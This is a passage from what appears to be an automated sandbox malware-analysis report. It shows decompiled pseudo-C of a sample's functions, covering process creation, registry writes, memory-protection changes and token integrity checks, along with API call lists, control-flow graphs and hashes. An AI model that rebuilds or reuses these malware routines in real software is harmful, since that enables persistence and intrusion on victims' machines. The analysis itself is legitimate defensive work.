					E01006E40(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10)); // executed
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					FindCloseChangeNotification(_t20); // executed
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E01006C2C(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E01006C2C(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E01006C2C(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E01006C2C(_t46);
				}
				return _t24;
			}












                          0x01004274
                          0x01004274
                          0x01004276
                          0x01004278
                          0x0100427f
                          0x01004286
                          0x01004286
                          0x0100428b
                          0x0100428e
                          0x01004295
                          0x0100429e
                          0x010042a2
                          0x010042a7
                          0x010042a7
                          0x010042a9
                          0x010042ae
                          0x010042b2
                          0x010042b7
                          0x010042b7
                          0x010042b9
                          0x010042be
                          0x010042c2
                          0x010042c7
                          0x010042c7
                          0x010042c9
                          0x010042d4
                          0x010042d7
                          0x010042d7
                          0x010042d9
                          0x010042de
                          0x010042e1
                          0x010042e1
                          0x010042e3
                          0x010042ea
                          0x010042ed
                          0x010042f2
                          0x010042f5
                          0x010042f5
                          0x010042f8
                          0x010042fd
                          0x01004300
                          0x01004300
                          0x01004305
                          0x01004309
                          0x0100430c
                          0x0100430c
                          0x01004311
                          0x01004316
                          0x00000000
                          0x01004319
                          0x01004320

                          APIs
                          • InternetSetStatusCallback.WININET(?,00000000), ref: 010042A2
                          • InternetCloseHandle.WININET(?), ref: 010042A7
                          • InternetSetStatusCallback.WININET(?,00000000), ref: 010042B2
                          • InternetCloseHandle.WININET(?), ref: 010042B7
                          • InternetSetStatusCallback.WININET(?,00000000), ref: 010042C2
                          • InternetCloseHandle.WININET(?), ref: 010042C7
                          • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,01003801,?,?,76CC81D0,00000000,00000000), ref: 010042D7
                          • CloseHandle.KERNEL32(?,00000000,00000102,?,?,01003801,?,?,76CC81D0,00000000,00000000), ref: 010042E1
                            • Part of subcall function 01006E40: WaitForMultipleObjects.KERNEL32(00000002,01007BB5,00000000,01007BB5,?,?,?,01007BB5,0000EA60), ref: 01006E5B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                          • String ID:
                          • API String ID: 2172891992-0
                          • Opcode ID: 6fe65229b05a25f7b0760698fff0db0367776f0449892cdc8d11664739a61815
                          • Instruction ID: 24be098855af3f977e89c6730ade559a90276bf8618115979772537c0f8fec1f
                          • Opcode Fuzzy Hash: 6fe65229b05a25f7b0760698fff0db0367776f0449892cdc8d11664739a61815
                          • Instruction Fuzzy Hash: 77117F766007489BE572AFBEEC84C5BBBEEEF442007950D58F6C5D3590C736F8848A64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B73959 Relevance: 10.7, APIs: 7, Instructions: 185registrysynchronizationprocessCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 446 5b73959-5b73991 call 5b7bad1 449 5b739f5-5b73a0a WaitForSingleObject 446->449 450 5b73993 446->450 451 5b73af4-5b73b2d RtlExitUserThread 449->451 452 5b73a10-5b73a1e 449->452 453 5b73996-5b739ab call 5b7a651 450->453 454 5b73b40-5b73b67 CreateProcessA 451->454 455 5b73b2f-5b73b3b 451->455 456 5b73a24-5b73a45 RegOpenKeyA 452->456 457 5b73ab0-5b73ac3 call 5b73829 452->457 465 5b739ad-5b739c4 453->465 466 5b739dc-5b739f3 call 5b7e803 453->466 462 5b73b74-5b73b76 454->462 463 5b73b69-5b73b6f call 5b75d7a 454->463 455->454 477 5b73b3d 455->477 460 5b73a47-5b73a69 RegSetValueExA RegCloseKey 456->460 461 5b73a6f-5b73a72 456->461 457->451 475 5b73ac5-5b73ad4 WaitForSingleObject 457->475 460->461 471 5b73a74-5b73a77 461->471 472 5b73a79-5b73aad call 5b7e778 461->472 467 5b73b7e-5b73b8c 462->467 468 5b73b78-5b73b79 call 5b7e803 462->468 463->462 465->466 483 5b739c6-5b739d7 call 5b6f39b 465->483 466->449 466->453 468->467 471->457 471->472 472->457 475->451 481 5b73ad6-5b73af1 call 5b7d30a 475->481 477->454 481->451 483->466
                          APIs
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 05B7BB1D
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 05B7BB29
                            • Part of subcall function 05B7BAD1: memset.NTDLL ref: 05B7BB71
                            • Part of subcall function 05B7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05B7BB8C
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(0000002C), ref: 05B7BBC4
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?), ref: 05B7BBCC
                            • Part of subcall function 05B7BAD1: memset.NTDLL ref: 05B7BBEF
                            • Part of subcall function 05B7BAD1: wcscpy.NTDLL ref: 05B7BC01
                          • WaitForSingleObject.KERNEL32(00000000,?,05FB9998,?,00000000,00000000,00000001), ref: 05B73A03
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05B73A3D
                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 05B73A60
                          • RegCloseKey.ADVAPI32(?), ref: 05B73A69
                          • WaitForSingleObject.KERNEL32(00000000), ref: 05B73ACD
                          • RtlExitUserThread.NTDLL(?), ref: 05B73B03
                            • Part of subcall function 05B7A651: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76C86920,00000000,?,?,?,05B6148A,?,?,?), ref: 05B7A66F
                            • Part of subcall function 05B7A651: GetFileSize.KERNEL32(00000000,00000000,?,?,05B6148A,?,?,?), ref: 05B7A67F
                            • Part of subcall function 05B7A651: CloseHandle.KERNEL32(000000FF,?,?,05B6148A,?,?,?), ref: 05B7A6E1
                          • CreateProcessA.KERNEL32(?,?,?,76CDF750,?,?,?,?,?,?,?,?,76CDF750), ref: 05B73B5C
                            • Part of subcall function 05B6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 05B6F3DB
                            • Part of subcall function 05B6F39B: GetLastError.KERNEL32 ref: 05B6F3E5
                            • Part of subcall function 05B6F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 05B6F40A
                            • Part of subcall function 05B6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 05B6F42D
                            • Part of subcall function 05B6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 05B6F455
                            • Part of subcall function 05B6F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 05B6F46A
                            • Part of subcall function 05B6F39B: SetEndOfFile.KERNEL32(00001000), ref: 05B6F477
                            • Part of subcall function 05B6F39B: CloseHandle.KERNEL32(00001000), ref: 05B6F48F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Createlstrlen$CloseObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerProcessSizeThreadUserValueWritewcscpy
                          • String ID:
                          • API String ID: 3876914104-0
                          • Opcode ID: 182a7c851737fa924ccc5fdd128603f1531ea3b8b382f21deed2af20dab94ee6
                          • Instruction ID: 8cf50a8836c11694e164c84cb4bbb36e2d2630cc7677e594e3bb4dd251e87f5c
                          • Opcode Fuzzy Hash: 182a7c851737fa924ccc5fdd128603f1531ea3b8b382f21deed2af20dab94ee6
                          • Instruction Fuzzy Hash: A9613C71A10209AFDB10DFA4D886EBE7BFAFB09320F1554A6F625A7250DB30B941DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B68C35 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 487 5b68c35-5b68c63 call 5b83d64 call 5b766d7 492 5b68d98-5b68d9f 487->492 493 5b68c69-5b68c7a call 5b633a5 487->493 494 5b68db5 492->494 495 5b68db8-5b68dc4 call 5b83d9f 492->495 500 5b68d90-5b68d96 GetLastError 493->500 501 5b68c80-5b68ca9 call 5b6a253 493->501 494->495 500->494 501->495 504 5b68caf-5b68cb6 501->504 505 5b68d13-5b68d3c VirtualProtect 504->505 506 5b68cb8-5b68cbf 504->506 508 5b68d47-5b68d81 RtlEnterCriticalSection RtlLeaveCriticalSection call 5b674ae 505->508 509 5b68d3e-5b68d42 call 5b6bdee 505->509 506->505 507 5b68cc1-5b68cd0 call 5b6ea5e 506->507 507->505 516 5b68cd2-5b68ce0 call 5b633a5 507->516 514 5b68d86-5b68d88 508->514 509->508 514->495 515 5b68d8a-5b68d8e 514->515 515->495 516->505 519 5b68ce2-5b68cfa 516->519 520 5b68d03-5b68d0d VirtualProtect 519->520 521 5b68cfc 519->521 520->505 521->520
                          APIs
                            • Part of subcall function 05B633A5: VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 05B633CA
                            • Part of subcall function 05B633A5: GetLastError.KERNEL32(?,00000000), ref: 05B633D2
                            • Part of subcall function 05B633A5: VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 05B633E9
                            • Part of subcall function 05B633A5: VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 05B6340E
                          • GetLastError.KERNEL32(00000000,00000004,?,?,80000000,00000000,00000001,05B860B0,0000001C,05B7BE61,00000002,?,00000001,80000000,05B89A20,80000000), ref: 05B68D90
                            • Part of subcall function 05B6A253: lstrlen.KERNEL32(?,?), ref: 05B6A28B
                            • Part of subcall function 05B6A253: lstrcpy.KERNEL32(00000000,?), ref: 05B6A2A2
                            • Part of subcall function 05B6A253: StrChrA.SHLWAPI(00000000,0000002E), ref: 05B6A2AB
                            • Part of subcall function 05B6A253: GetModuleHandleA.KERNEL32(00000000), ref: 05B6A2C9
                          • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 05B68D0D
                          • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,05B860B0,0000001C,05B7BE61), ref: 05B68D28
                          • RtlEnterCriticalSection.NTDLL(05B8A400), ref: 05B68D4D
                          • RtlLeaveCriticalSection.NTDLL(05B8A400), ref: 05B68D6B
                            • Part of subcall function 05B633A5: SetLastError.KERNEL32(80000000,?,00000000), ref: 05B63417
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                          • String ID:
                          • API String ID: 899430048-3916222277
                          • Opcode ID: bdb473aea4fcf8aefb1c5f264d6ae407de71f0a5be212556a9857a33364a09e2
                          • Instruction ID: 22e936eaa31623e5929330dc89d8aa9c0b45e79a2e4649b78f0520372074cd7f
                          • Opcode Fuzzy Hash: bdb473aea4fcf8aefb1c5f264d6ae407de71f0a5be212556a9857a33364a09e2
                          • Instruction Fuzzy Hash: FF414971900619AFDB11DF68C84AAAEBBF5FF08310F148159F915AB290D778F950CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B755E4 Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B761AE: GetProcAddress.KERNEL32(?,00000318), ref: 05B761D3
                            • Part of subcall function 05B761AE: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 05B761EF
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05B7561D
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 05B75708
                            • Part of subcall function 05B761AE: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 05B76359
                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 05B75653
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05B7565F
                          • lstrcmpi.KERNEL32(?,00000000), ref: 05B7569C
                          • StrChrA.SHLWAPI(?,0000002E), ref: 05B756A5
                          • lstrcmpi.KERNEL32(?,00000000), ref: 05B756B7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                          • String ID:
                          • API String ID: 3901270786-0
                          • Opcode ID: b2ac772e507aa90604aed8db26165174d8a66873ae8caeead81f6aa3b2c3a9e5
                          • Instruction ID: 16c208eb27646e67a0d2b68080357566c993cebd68099adb94b5fd57b402be03
                          • Opcode Fuzzy Hash: b2ac772e507aa90604aed8db26165174d8a66873ae8caeead81f6aa3b2c3a9e5
                          • Instruction Fuzzy Hash: 31315B71608319ABE7318E11CC44F2BBBE9FF84B54F100959F995A72C0D774F904CAAA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0100402A Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E0100402A(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E010044DE(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E01007A1E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x100a300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x100a348; // 0x428d5a8
					_t18 = _t47 + 0x100b3f3; // 0x73797325
					_t68 = E01007326(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x100a348; // 0x428d5a8
						_t19 = _t50 + 0x100b73f; // 0x5298ce7
						_t20 = _t50 + 0x100b0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E010023AA();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E010023AA();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								FindCloseChangeNotification(_v28); // executed
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x100a2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E01006C2C(_t70);
				goto L12;
			}


















                          0x01004032
                          0x01004032
                          0x01004041
                          0x01004048
                          0x0100404d
                          0x0100415a
                          0x01004161
                          0x01004161
                          0x0100405c
                          0x01004064
                          0x01004067
                          0x0100406c
                          0x01004081
                          0x01004087
                          0x01004088
                          0x0100408b
                          0x01004091
                          0x01004094
                          0x01004099
                          0x010040a1
                          0x010040ad
                          0x010040b1
                          0x01004141
                          0x010040b7
                          0x010040b7
                          0x010040bc
                          0x010040c3
                          0x010040d7
                          0x010040db
                          0x0100412a
                          0x010040dd
                          0x010040de
                          0x010040e5
                          0x010040fe
                          0x01004100
                          0x01004104
                          0x0100410b
                          0x01004125
                          0x0100410d
                          0x01004116
                          0x0100411b
                          0x0100411b
                          0x0100410b
                          0x01004139
                          0x01004139
                          0x010040b1
                          0x01004148
                          0x01004151
                          0x01004155
                          0x00000000

                          APIs
                            • Part of subcall function 010044DE: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01004046,?,?,?,?,00000000,00000000), ref: 01004503
                            • Part of subcall function 010044DE: GetProcAddress.KERNEL32(00000000,7243775A), ref: 01004525
                            • Part of subcall function 010044DE: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0100453B
                            • Part of subcall function 010044DE: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01004551
                            • Part of subcall function 010044DE: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01004567
                            • Part of subcall function 010044DE: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 0100457D
                          • memset.NTDLL ref: 01004094
                            • Part of subcall function 01007326: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,010040AD,73797325), ref: 01007337
                            • Part of subcall function 01007326: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 01007351
                          • GetModuleHandleA.KERNEL32(4E52454B,05298CE7,73797325), ref: 010040CA
                          • GetProcAddress.KERNEL32(00000000), ref: 010040D1
                          • HeapFree.KERNEL32(00000000,00000000), ref: 01004139
                            • Part of subcall function 010023AA: GetProcAddress.KERNEL32(36776F57,01007989), ref: 010023C5
                          • FindCloseChangeNotification.KERNEL32(00000000,00000001), ref: 01004116
                          • CloseHandle.KERNEL32(?), ref: 0100411B
                          • GetLastError.KERNEL32(00000001), ref: 0100411F
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ChangeErrorFindFreeHeapLastNotificationmemset
                          • String ID:
                          • API String ID: 186216982-0
                          • Opcode ID: 257b04280dd78a389ae519601324628dd4865599a159ab86f2306c536bf46590
                          • Instruction ID: 3af7fdd4846b9509dbce75f638cce570bb47c28110bcf25b7994587642280113
                          • Opcode Fuzzy Hash: 257b04280dd78a389ae519601324628dd4865599a159ab86f2306c536bf46590
                          • Instruction Fuzzy Hash: 94315E76900209EFEB22EFA4DC88EDEBBBCEB18304F104465F685E7151D7356A44CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B612E7 Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B673EB: memset.NTDLL ref: 05B673F5
                          • OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,05B6E2A4,?,?,?,?,?,?,?,05B69100,?), ref: 05B61381
                          • SetEvent.KERNEL32(00000000,?,05B6E2A4,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B6138E
                          • Sleep.KERNEL32(00000BB8,?,05B6E2A4,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B61399
                          • ResetEvent.KERNEL32(00000000,?,05B6E2A4,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B613A0
                          • CloseHandle.KERNEL32(00000000,?,05B6E2A4,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B613A7
                          • GetShellWindow.USER32 ref: 05B613B2
                          • GetWindowThreadProcessId.USER32(00000000), ref: 05B613B9
                            • Part of subcall function 05B7B1DC: RegCloseKey.ADVAPI32(05B6E2A4), ref: 05B7B25F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                          • String ID:
                          • API String ID: 53838381-0
                          • Opcode ID: bf698264de8eca43353cfb7785e84d8e8399bcbff42de257ea5e1bf804f55f98
                          • Instruction ID: 0a73cdbf1e22db4cf236797b4c82d2b6265ea542477e3620f4ed95a499cae04a
                          • Opcode Fuzzy Hash: bf698264de8eca43353cfb7785e84d8e8399bcbff42de257ea5e1bf804f55f98
                          • Instruction Fuzzy Hash: 13218372715204BFC3216A6A9C4AE3F7FABEBCA620F149046F61A97540DF39B441C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01006C41 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E01006C41(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x100a2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E01006D63(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E01006C2C(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                          0x01006c4e
                          0x01006c55
                          0x01006c5c
                          0x01006c70
                          0x01006c7b
                          0x01006c93
                          0x01006ca0
                          0x01006ca3
                          0x01006ca8
                          0x01006cb3
                          0x01006cb7
                          0x01006cc6
                          0x01006cca
                          0x01006ce6
                          0x01006ce6
                          0x01006cea
                          0x01006cea
                          0x01006cef
                          0x01006cf3
                          0x01006cf9
                          0x01006cfa
                          0x01006d01
                          0x01006d07

                          APIs
                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 01006C73
                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 01006C93
                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 01006CA3
                          • CloseHandle.KERNEL32(00000000), ref: 01006CF3
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 01006CC6
                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01006CCE
                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01006CDE
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                          • String ID:
                          • API String ID: 1295030180-0
                          • Opcode ID: 8c9f8c1d706971555d62ed43e0692f879e780263627fe1f9bc5fdfd9f01c49db
                          • Instruction ID: 8639c6570e24a6e133752ed21685aedb210c9cedf01d918ed02d09847d2a4954
                          • Opcode Fuzzy Hash: 8c9f8c1d706971555d62ed43e0692f879e780263627fe1f9bc5fdfd9f01c49db
                          • Instruction Fuzzy Hash: AF212A75D0021DFFEB12DF94DD44EEEBBBAEB04304F0000A5FA50A6191D7769A54DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01001D33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E01001D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x100a348; // 0x428d5a8
				_t1 = _t9 + 0x100b624; // 0x253d7325
				_t36 = 0;
				_t28 = E0100624E(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x52995b1
					_t40 = E01006D63(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E010024B3(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E01006C2C(_t40);
						_t42 = E01005A07(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E01006C2C(_t36);
							_t36 = _t42;
						}
						_t43 = E01004162(_t36, _t33);
						if(_t43 != 0) {
							E01006C2C(_t36);
							_t36 = _t43;
						}
					}
					E01006C2C(_t28);
				}
				return _t36;
			}
















                          0x01001d33
                          0x01001d36
                          0x01001d37
                          0x01001d3e
                          0x01001d45
                          0x01001d4c
                          0x01001d50
                          0x01001d57
                          0x01001d5e
                          0x01001d63
                          0x01001d6b
                          0x01001d75
                          0x01001d79
                          0x01001d7d
                          0x01001d83
                          0x01001d88
                          0x01001d92
                          0x01001d98
                          0x01001d9a
                          0x01001db1
                          0x01001db5
                          0x01001db8
                          0x01001dbd
                          0x01001dbd
                          0x01001dc6
                          0x01001dca
                          0x01001dcd
                          0x01001dd2
                          0x01001dd2
                          0x01001dca
                          0x01001dd5
                          0x01001dda
                          0x01001de0

                          APIs
                            • Part of subcall function 0100624E: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01001D4C,253D7325,00000000,00000000,?,75BCC740,010058D7), ref: 010062B5
                            • Part of subcall function 0100624E: sprintf.NTDLL ref: 010062D6
                          • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,75BCC740,010058D7,00000000,052995B0), ref: 01001D5E
                          • lstrlen.KERNEL32(00000000,?,75BCC740,010058D7,00000000,052995B0), ref: 01001D66
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • strcpy.NTDLL ref: 01001D7D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 01001D88
